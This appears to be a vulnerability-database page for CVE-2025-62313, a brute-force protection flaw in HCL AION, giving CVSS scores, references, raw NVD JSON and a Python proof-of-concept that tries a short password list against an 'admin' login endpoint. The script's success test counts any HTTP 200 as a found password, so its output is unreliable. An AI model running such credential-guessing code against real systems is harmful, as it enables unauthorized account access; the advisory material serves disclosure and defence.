CVE-2025-62313

Description

HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL AION (具体受影响版本请参考官方公告 KB0130636)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-62313 PoC: Brute Force Protection Bypass
# Target: HCL AION
# Description: This script demonstrates the lack of rate limiting on the login endpoint.

TARGET_URL = "http://target-hcl-aion/login"
USERNAME = "admin"
PASSWORD_LIST = ["password", "123456", "admin", "root"] # Example list

def brute_force_login():
    session = requests.Session()
    for password in PASSWORD_LIST:
        payload = {
            "username": USERNAME,
            "password": password
        }
        try:
            response = session.post(TARGET_URL, data=payload, timeout=5)
            # Check for success indicators (e.g., status 200, specific text)
            if "Login successful" in response.text or response.status_code == 200:
                print(f"[+] Success! Password found: {password}")
                return
            elif response.status_code == 429:
                print("[-] Rate limit detected. Exploit failed.")
                return
            else:
                print(f"[-] Attempt with '{password}' failed. Status: {response.status_code}")
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    brute_force_login()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62313
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62313
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62313/
[4] VulDB https://vuldb.com/cve/CVE-2025-62313
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62313", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:18.660", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}